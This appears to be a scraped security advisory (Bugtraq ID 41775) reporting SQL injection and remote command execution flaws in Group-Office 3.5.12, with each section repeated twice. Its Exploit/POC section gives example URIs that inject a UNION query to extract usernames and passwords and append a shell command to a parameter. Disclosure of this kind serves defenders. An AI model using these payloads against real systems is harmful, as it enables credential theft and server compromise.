Group-Office SQL Injection Vulnerability and Remote Command Execution Vulnerability
BID:41775
Info
Group-Office SQL Injection Vulnerability and Remote Command Execution Vulnerability
| Bugtraq ID: | 41775 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 19 2010 12:00AM |
| Updated: | Jul 19 2010 12:00AM |
| Credit: | Canberk Bolat and ADEO Security |
| Vulnerable: |
Intermesh Group-Office 3.5.12 |
| Not Vulnerable: | |
Discussion
Group-Office SQL Injection Vulnerability and Remote Command Execution Vulnerability
Group-Office is prone to an SQL-injection vulnerability and a remote command-execution vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Group-Office 3.5.12 is vulnerable; other versions may also be affected.
Group-Office is prone to an SQL-injection vulnerability and a remote command-execution vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Group-Office 3.5.12 is vulnerable; other versions may also be affected.
Exploit / POC
Group-Office SQL Injection Vulnerability and Remote Command Execution Vulnerability
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/groupoffice/modules/comments/json.php?task=comment&comment_id=888881+union+select+1,2,3,4,5,6 (select+concat_ws(0x3a,username,password)+from+go_users+where+id=1)
http://www.example.com/groupoffice/modules/gnupg/json.php?task=send_key&fingerprint=xyz;COMMAND
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/groupoffice/modules/comments/json.php?task=comment&comment_id=888881+union+select+1,2,3,4,5,6 (select+concat_ws(0x3a,username,password)+from+go_users+where+id=1)
http://www.example.com/groupoffice/modules/gnupg/json.php?task=send_key&fingerprint=xyz;COMMAND
Solution / Fix
Group-Office SQL Injection Vulnerability and Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Group-Office SQL Injection Vulnerability and Remote Command Execution Vulnerability
References:
References:
- Group-Office Homepage (Intermesh)